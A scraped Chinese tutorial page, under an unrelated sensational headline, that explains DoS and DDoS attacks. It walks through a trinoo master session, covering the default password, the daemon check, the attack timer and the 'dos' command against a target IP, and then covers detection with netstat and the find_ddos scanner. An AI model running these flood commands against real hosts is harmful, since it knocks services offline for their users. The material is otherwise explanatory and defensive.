高校问答空姐被掐死勒死:DDOS攻击
来源:百度文库 编辑:高校问答 时间:2024/04/27 20:56:21
DoS的英文全称是Denial of Service,也就是“拒绝服务”的意思。从网络攻击的各种方法和所产生的破坏情况来看,DoS算是一种很简单但又很有效的进攻方式。它的目的就是拒绝你的服务访问,破坏组织的正常运行,最终它会使你的部分Internet连接和网络系统失效。DoS的攻击方式有很多种,最基本的DoS攻击就是利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务。
我们可以看出DoS攻击的基本过程:首先攻击者向服务器发送众多的带有虚假地址的请求,服务器发送回复信息后等待回传信息,由于地址是伪造的,所以服务器一直等不到回传的消息,分配给这次请求的资源就始终没有被释放。当服务器等待一定的时间后,连接会因超时而被切断,攻击者会再度传送新的一批请求,在这种反复发送伪地址请求的情况下,服务器资源最终会被耗尽。
DDoS(分布式拒绝服务),它的英文全称为Distributed Denial of Service,它是一种基于DoS的特殊形式的拒绝服务攻击,是一种分布、协作的大规模攻击方式,主要瞄准比较大的站点,象商业公司,搜索引擎和政府部门的站点。从图1我们可以看出DoS攻击只要一台单机和一个modem就可实现,与之不同的是DDoS攻击是利用一批受控制的机器向一台机器发起攻击,这样来势迅猛的攻击令人难以防备,因此具有较大的破坏性。
DDoS攻击原理及工具介绍
在任意一台与网络连通的可使用telnet的设备上,执行
telnet 11.22.33.44 27665
Escape character is '^]'.
betaalmostdone (输入密码)
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
trinoo> (进入提示符)
trinoo> mping (我们首先来监测一下各个攻击守护进程是否成功启动)
mping: Sending a PING to every Bcasts.
trinoo> PONG 1 Received from 11.11.11.11
PONG 2 Received from 22.22.22.22
PONG 3 Received from 33.33.33.33 (成功响应)
trinoo> mtimer 60 (设定攻击时间为60秒)
mtimer: Setting timer on bcast to 60.
trinoo> dos 12.23.34.45
DoS: Packeting 12.23.34.45......
至此一次攻击结束,此时ping 12.23.34.45,会得到icmp不可到达反馈,目标主机此时与网络的正常连接已被破坏。
由于目前版本的trinoo尚未采用IP地址欺骗,因此在被攻击的主机系统日志里我们可以看到如下纪录:
Mar 20 14:40:34 victim snmpXdmid: Will attempt to re-establish connection.
Mar 20 14:40:35 victim snmpdx: error while receiving a pdu from 11.11.11.11.59841: The message has a wrong header type (0x0)
Mar 20 14:40:35 victim snmpdx: error while receiving a pdu from 22.22.22.22.43661: The message has a wrong header type (0x0)
Mar 20 14:40:36 victim snmpdx: error while receiving a pdu from 33.33.33.33.40183: The message has a wrong header type (0x0)
Mar 20 14:40:36 victim snmpXdmid: Error receiving PDU The message has a wrong header type (0x0).
Mar 20 14:40:36 victim snmpXdmid: Error receiving packet from agent; rc = -1.
Mar 20 14:40:36 victim snmpXdmid: Will attempt to re-establish connection.
Mar 20 14:40:36 victim snmpXdmid: Error receiving PDU The message has a wrong header type (0x0).
Mar 20 14:40:36 victim snmpXdmid: Error receiving packet from agent; rc = -1.
由上述日志,我们不难看出发起攻击的ip地址,这一问题,通过ip spoof在后期的软件tfn,tfn2k等软件中得到了解决,给被攻击者找出肇事者进一步增加了难度。
Trinoo等DdoS攻击软件的出现,对网络的安全产生了巨大的挑战,借助这种在网上可以得到的公开软件,任何一个普通的上网者对网络的安全都构成了潜在的威胁,那么能不能做一些预防工作呢?
有一些是可以做的,
首先,检测自己的系统是否被植入了攻击守护程序,最简单的办法,检测上述提到的udp端口,如netstat -a | grep udp 端口号,如果得到listen等激活状态,就要注意了,或者用专门的检测软件,这里推荐美国FBI专门研制的Find Distributed Denial of Service (find_ddos) , 最新版本的可检测到tfn2k client, tfn2k daemon, trinoo daemon, trinoo master, tfn daemon, tfn client, stacheldraht master, stacheldraht client, stachelddraht demon和 tfn-rush client等目前几乎所有流行攻击软件。 它的运行很简单,解开包,运行find_ddos即可,下面为在一台可疑设备运行结果,
Logging output to: LOG
Scanning running processes...
/proc/795/object/a.out: trinoo daemon
/usr/bin/gcore: core.795 dumped
/proc/800/object/a.out: trinoo master
/usr/bin/gcore: core.800 dumped
Scanning "/tmp"...
Scanning "/"...
/yiming/tfn2k/td: tfn2k daemon
/yiming/tfn2k/tfn: tfn2k client
/yiming/trinoo/daemon/ns: trinoo daemon
/yiming/trinoo/master/master: trinoo master
/yiming/trinoo/master/...: possible IP list file
NOTE: This message is based on the filename being suspicious, and is not
based on an analysis of the file contents. It is up to you to examine the
file and decide whether it is actually an IP list file related to a DDOS
tool.
/yiming/stacheldrahtV4/leaf/td: stacheldraht daemon
/yiming/stacheldrahtV4/telnetc/client: stacheldraht client
/yiming/stacheldrahtV4/td: stacheldraht daemon
/yiming/stacheldrahtV4/client: stacheldraht client
/yiming/stacheldrahtV4/mserv: stacheldraht master
ALERT: One or more DDOS tools were found on your system.
Please examine LOG and take appropriate action.
分布式拒绝服务(DDoS:Distributed Denial of Service)攻击指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DoS攻击,从而成倍地提高拒绝服务攻击的威力。通常,攻击者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上,在一个设定的时间主控程序将与大量代理程序通讯,代理程序已经被安装在Internet上的许多计算机上。代理程序收到指令时就发动攻击。利用客户/服务器技术,主控程序能在几秒钟内激活成百上千次代理程序的运行。